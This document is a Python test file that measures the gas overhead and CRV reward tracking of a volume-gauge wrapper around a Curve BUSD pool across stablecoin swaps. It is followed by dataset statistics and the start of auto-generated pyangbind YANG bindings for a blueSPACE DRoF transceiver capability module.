newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ybusd_to_yusdt(_busdvolgauge, busdpool, yBUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(3, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(3, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yBUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yBUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_usdc(_busdvolgauge, busdpool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_dai(_busdvolgauge, busdpool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_usdt(_busdvolgauge, busdpool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_dai(_busdvolgauge, busdpool, USDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_busd(_busdvolgauge, busdpool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_busd_to_dai(_busdvolgauge, busdpool, BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_usdt(_busdvolgauge, busdpool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_usdc(_busdvolgauge, busdpool, USDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_busd(_busdvolgauge, busdpool, USDC, tracker, accounts):
    """Swap 50 USDC for BUSD five times, via the volume gauge and via the raw
    pool, printing the gauge's gas overhead and the USDC volume-EMA / reward
    figures reported by the tracker."""
    for attempt in range(1, 6):
        print("Attemp #" + str(attempt) + " .....")
        reward_before = tracker.rewardAmount()
        # Gauge-wrapped swap: underlying index 1 (USDC, 6 decimals) -> 3 (BUSD).
        gauge_tx = _busdvolgauge.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
        vgas = gauge_tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        # Identical swap on the raw pool to isolate the gauge's extra gas.
        pool_tx = busdpool.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
        print("OriginGas : " + str(pool_tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - pool_tx.gas_used) + " Unit")
        reward_after = tracker.rewardAmount()
        prev_data = tracker.lastVolumeData(USDC)
        curr_data = tracker.currentVolumeData(USDC)
        # EMA blend of (volume, amount) using the module-level ALPHA weight.
        ema_volume = ALPHA * prev_data[0] + (DENOMINATOR - ALPHA) * curr_data[0]
        ema_amount = ALPHA * prev_data[1] + (DENOMINATOR - ALPHA) * curr_data[1]
        price_v_ema = ema_volume / ema_amount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(reward_after) + " (" + str(reward_after / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(reward_after - reward_before) / DENOMINATOR) + " CRV")
def test_exchange_underlying_busd_to_usdc(_busdvolgauge, busdpool, BUSD, tracker, accounts):
    """Swap 50 BUSD for USDC five times, via the volume gauge and via the raw
    pool, printing the gauge's gas overhead and the BUSD volume-EMA / reward
    figures reported by the tracker."""
    for attempt in range(1, 6):
        print("Attemp #" + str(attempt) + " .....")
        reward_before = tracker.rewardAmount()
        # Gauge-wrapped swap: underlying index 3 (BUSD, 18 decimals) -> 1 (USDC).
        gauge_tx = _busdvolgauge.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
        vgas = gauge_tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        # Identical swap on the raw pool to isolate the gauge's extra gas.
        pool_tx = busdpool.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
        print("OriginGas : " + str(pool_tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - pool_tx.gas_used) + " Unit")
        reward_after = tracker.rewardAmount()
        prev_data = tracker.lastVolumeData(BUSD)
        curr_data = tracker.currentVolumeData(BUSD)
        # EMA blend of (volume, amount) using the module-level ALPHA weight.
        ema_volume = ALPHA * prev_data[0] + (DENOMINATOR - ALPHA) * curr_data[0]
        ema_amount = ALPHA * prev_data[1] + (DENOMINATOR - ALPHA) * curr_data[1]
        price_v_ema = ema_volume / ema_amount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(reward_after) + " (" + str(reward_after / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(reward_after - reward_before) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_busd(_busdvolgauge, busdpool, USDT, tracker, accounts):
    """Swap 50 USDT for BUSD five times, via the volume gauge and via the raw
    pool, printing the gauge's gas overhead and the USDT volume-EMA / reward
    figures reported by the tracker.

    Fix: this test previously duplicated test_exchange_underlying_usdc_to_busd
    verbatim — it swapped underlying index 1 (USDC) and queried the tracker
    with the USDC fixture. USDT is underlying index 2 (see
    test_exchange_underlying_usdt_to_usdc), so the swap is now 2 -> 3 and the
    tracker is queried with USDT.
    """
    for i in range(5):
        print("Attemp #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        # Gauge-wrapped swap: underlying index 2 (USDT, 6 decimals) -> 3 (BUSD).
        tx = _busdvolgauge.exchange_underlying(2, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        # Identical swap on the raw pool to isolate the gauge's extra gas.
        tx = busdpool.exchange_underlying(2, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(USDT)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(USDT)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        # EMA blend of (volume, amount); ALPHA and DENOMINATOR are
        # module-level weights defined elsewhere in this file.
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_busd_to_usdt(_busdvolgauge, busdpool, BUSD, tracker, accounts):
    """Swap 50 BUSD for USDT five times, via the volume gauge and via the raw
    pool, printing the gauge's gas overhead and the BUSD volume-EMA / reward
    figures reported by the tracker.

    Fix: this test previously duplicated test_exchange_underlying_busd_to_usdc
    verbatim — it swapped into underlying index 1 (USDC). USDT is underlying
    index 2 (see test_exchange_underlying_usdt_to_usdc), so the swap is now
    3 -> 2. Volume tracking stays on BUSD, the source side of the trade.
    """
    for i in range(5):
        print("Attemp #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        # Gauge-wrapped swap: underlying index 3 (BUSD, 18 decimals) -> 2 (USDT).
        tx = _busdvolgauge.exchange_underlying(3, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        # Identical swap on the raw pool to isolate the gauge's extra gas.
        tx = busdpool.exchange_underlying(3, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(BUSD)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(BUSD)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        # EMA blend of (volume, amount); ALPHA and DENOMINATOR are
        # module-level weights defined elsewhere in this file.
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
| 61.555556
| 130
| 0.648209
| 4,017
| 36,010
| 5.550162
| 0.017177
| 0.103342
| 0.081812
| 0.066741
| 0.991254
| 0.990312
| 0.990312
| 0.990312
| 0.990312
| 0.990312
| 0
| 0.021757
| 0.222688
| 36,010
| 584
| 131
| 61.660959
| 0.774749
| 0.000472
| 0
| 0.876122
| 0
| 0
| 0.116693
| 0.036008
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043088
| false
| 0
| 0.001795
| 0
| 0.044883
| 0.301616
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d75e51d447a4a8c0118e1c36621cf3b0c22e5d78
| 84,818
|
py
|
Python
|
Netconf/bindings/bindingCapability.py
|
lrodrin/transceivers
|
62b8e44c0a459615a0464a9567e28e195c4dabf1
|
[
"MIT"
] | null | null | null |
Netconf/bindings/bindingCapability.py
|
lrodrin/transceivers
|
62b8e44c0a459615a0464a9567e28e195c4dabf1
|
[
"MIT"
] | null | null | null |
Netconf/bindings/bindingCapability.py
|
lrodrin/transceivers
|
62b8e44c0a459615a0464a9567e28e195c4dabf1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved).
# The generated bindings below reference `__builtin__` and `long`, which
# only exist on Python 2; on Python 3 alias them to their replacements.
if six.PY3:
  import builtins as __builtin__
  long = int
elif six.PY2:
  import __builtin__
class yc_supportable_capacity_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_capacity(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability/supportable-capacity. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.
  """
  # Restrict instances to the pyangbind plumbing plus this container's two
  # leaves (the double-underscore names are mangled to class-private slots).
  __slots__ = ('_path_helper', '_extmethods', '__max_capacity','__min_capacity',)

  _yang_name = 'supportable-capacity'
  _pybind_generated_by = 'container'

  def __init__(self, *args, **kwargs):
    # Build the two state (config: false) uint32 leaves with their YANG
    # metadata; values are range-restricted to 0..4294967295.
    self._path_helper = False
    self._extmethods = False
    self.__max_capacity = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
    self.__min_capacity = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="min-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)

    load = kwargs.pop("load", None)
    if args:
      # A single positional argument is treated as a source object to copy
      # from; it must expose every element listed in _pyangbind_elements.
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          # Element is still at its default on the source object - skip it.
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          # Propagate the `load` flag so setters know this is a data load.
          setmethod(getattr(args[0], e), load=load)

  def _path(self):
    # Absolute YANG path of this container; fall back to the static path
    # when the instance has not been attached to a parent.
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return ['DRoF-TP-capability', 'supportable-capacity']

  def _get_max_capacity(self):
    """
    Getter method for max_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity/max_capacity (uint32)

    YANG Description: e.g 50
    """
    return self.__max_capacity

  def _set_max_capacity(self, v, load=False):
    """
    Setter method for max_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity/max_capacity (uint32)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_max_capacity is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_max_capacity() directly.

    YANG Description: e.g 50
    """
    if hasattr(v, "_utype"):
      # Unwrap a previously-wrapped pyangbind value to its native type.
      v = v._utype(v)
    try:
      # Re-wrap the value in the leaf's restricted uint32 type; a failure
      # here means the supplied value is not uint32-compatible.
      t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """max_capacity must be of a type compatible with uint32""",
          'defined-type': "uint32",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)""",
        })
    self.__max_capacity = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_max_capacity(self):
    # Reset the leaf to a freshly-constructed default instance.
    self.__max_capacity = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)

  def _get_min_capacity(self):
    """
    Getter method for min_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity/min_capacity (uint32)

    YANG Description: e.g 5
    """
    return self.__min_capacity

  def _set_min_capacity(self, v, load=False):
    """
    Setter method for min_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity/min_capacity (uint32)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_min_capacity is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_min_capacity() directly.

    YANG Description: e.g 5
    """
    if hasattr(v, "_utype"):
      # Unwrap a previously-wrapped pyangbind value to its native type.
      v = v._utype(v)
    try:
      # Re-wrap the value in the leaf's restricted uint32 type; a failure
      # here means the supplied value is not uint32-compatible.
      t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="min-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """min_capacity must be of a type compatible with uint32""",
          'defined-type': "uint32",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="min-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)""",
        })
    self.__min_capacity = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_min_capacity(self):
    # Reset the leaf to a freshly-constructed default instance.
    self.__min_capacity = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="min-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)

  # Both leaves are config: false, so only read-only properties (no public
  # setters) are exposed.
  max_capacity = __builtin__.property(_get_max_capacity)
  min_capacity = __builtin__.property(_get_min_capacity)

  _pyangbind_elements = OrderedDict([('max_capacity', max_capacity), ('min_capacity', min_capacity), ])
class yc_supportable_constellation_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_constellation(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability/supportable-constellation. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.
  """
  # Restrict instances to the pyangbind plumbing plus this container's two
  # leaves (the double-underscore names are mangled to class-private slots).
  __slots__ = ('_path_helper', '_extmethods', '__constellation_id','__mod_type',)

  _yang_name = 'supportable-constellation'
  _pybind_generated_by = 'container'

  def __init__(self, *args, **kwargs):
    # mod-type is an identityref limited to the modulation identities of the
    # module (bpsk / qam4..qam256, accepted with or without module prefix);
    # constellation-id is a string marked is_keyval=True, i.e. the list key.
    self._path_helper = False
    self._extmethods = False
